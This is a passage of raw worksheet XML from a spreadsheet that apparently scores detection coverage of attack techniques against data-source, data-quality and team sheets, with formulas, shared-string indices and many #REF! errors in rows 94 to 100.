        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W94" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X94" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F94&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F94))-LEN(SUBSTITUTE(TRIM(F94),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y94" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="95" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A95" s="8" t="s">
        <v>47</v>
      </c>
      <c r="B95" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C95" s="8" t="s">
        <v>656</v>
      </c>
      <c r="D95" s="10" t="s">
        <v>657</v>
      </c>
      <c r="E95" s="10" t="s">
        <v>299</v>
      </c>
      <c r="F95" s="10" t="s">
        <v>413</v>
      </c>
      <c r="G95" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K95,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H95" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I95" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J95" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K95" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L95" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M95" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O95" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q95" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S95" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U95" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W95" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X95" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F95&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F95))-LEN(SUBSTITUTE(TRIM(F95),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y95" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="96" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A96" s="8" t="s">
        <v>141</v>
      </c>
      <c r="B96" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C96" s="8" t="s">
        <v>658</v>
      </c>
      <c r="D96" s="10" t="s">
        <v>659</v>
      </c>
      <c r="E96" s="10" t="s">
        <v>660</v>
      </c>
      <c r="F96" s="10" t="s">
        <v>661</v>
      </c>
      <c r="G96" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K96,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H96" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I96" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J96" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K96" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L96" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M96" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O96" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q96" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S96" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U96" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W96" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X96" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F96&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F96))-LEN(SUBSTITUTE(TRIM(F96),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y96" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="97" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A97" s="8" t="s">
        <v>204</v>
      </c>
      <c r="B97" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C97" s="8" t="s">
        <v>662</v>
      </c>
      <c r="D97" s="10" t="s">
        <v>663</v>
      </c>
      <c r="E97" s="10" t="s">
        <v>664</v>
      </c>
      <c r="F97" s="10" t="s">
        <v>665</v>
      </c>
      <c r="G97" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K97,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H97" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I97" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J97" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K97" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L97" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M97" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O97" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q97" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S97" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U97" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W97" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X97" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F97&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F97))-LEN(SUBSTITUTE(TRIM(F97),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y97" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="98" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A98" s="8" t="s">
        <v>64</v>
      </c>
      <c r="B98" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C98" s="8" t="s">
        <v>666</v>
      </c>
      <c r="D98" s="10" t="s">
        <v>667</v>
      </c>
      <c r="E98" s="10" t="s">
        <v>668</v>
      </c>
      <c r="F98" s="10" t="s">
        <v>669</v>
      </c>
      <c r="G98" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K98,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H98" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I98" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J98" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K98" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L98" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M98" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O98" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q98" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S98" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U98" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W98" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X98" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F98&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F98))-LEN(SUBSTITUTE(TRIM(F98),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y98" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="99" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A99" s="8" t="s">
        <v>13</v>
      </c>
      <c r="B99" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C99" s="8" t="s">
        <v>670</v>
      </c>
      <c r="D99" s="10" t="s">
        <v>671</v>
      </c>
      <c r="E99" s="10" t="s">
        <v>672</v>
      </c>
      <c r="F99" s="10" t="s">
        <v>669</v>
      </c>
      <c r="G99" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K99,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H99" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I99" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J99" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K99" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L99" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M99" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O99" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q99" s="18" t="e">
        <f t="shared" si="11"/>
        <v>#REF!</v>
      </c>
      <c r="R99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S99" s="18" t="e">
        <f t="shared" si="12"/>
        <v>#REF!</v>
      </c>
      <c r="T99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U99" s="18" t="e">
        <f t="shared" si="13"/>
        <v>#REF!</v>
      </c>
      <c r="V99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W99" s="18" t="e">
        <f t="shared" si="14"/>
        <v>#REF!</v>
      </c>
      <c r="X99" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F99&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F99))-LEN(SUBSTITUTE(TRIM(F99),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y99" s="18" t="e">
        <f t="shared" si="15"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="100" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A100" s="8" t="s">
        <v>217</v>
      </c>
      <c r="B100" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C100" s="8" t="s">
        <v>673</v>
      </c>
      <c r="D100" s="10" t="s">
        <v>674</v>
      </c>
      <c r="E100" s="10" t="s">
        <v>675</v>
      </c>
      <c r="F100" s="10" t="s">
        <v>676</v>
      </c>
      <c r="G100" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K100,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H100" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I100" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J100" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K100" s="51">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="L100" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M100" s="18" t="str">
        <f t="shared" si="9"/>
        <v>0-20</v>
      </c>
      <c r="N100" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F100&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F100))-LEN(SUBSTITUTE(TRIM(F100),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O100" s="18" t="e">
        <f t="shared" si="10"/>
        <v>#REF!</v>
      </c>
      <c r="P100" s="20" t="e">
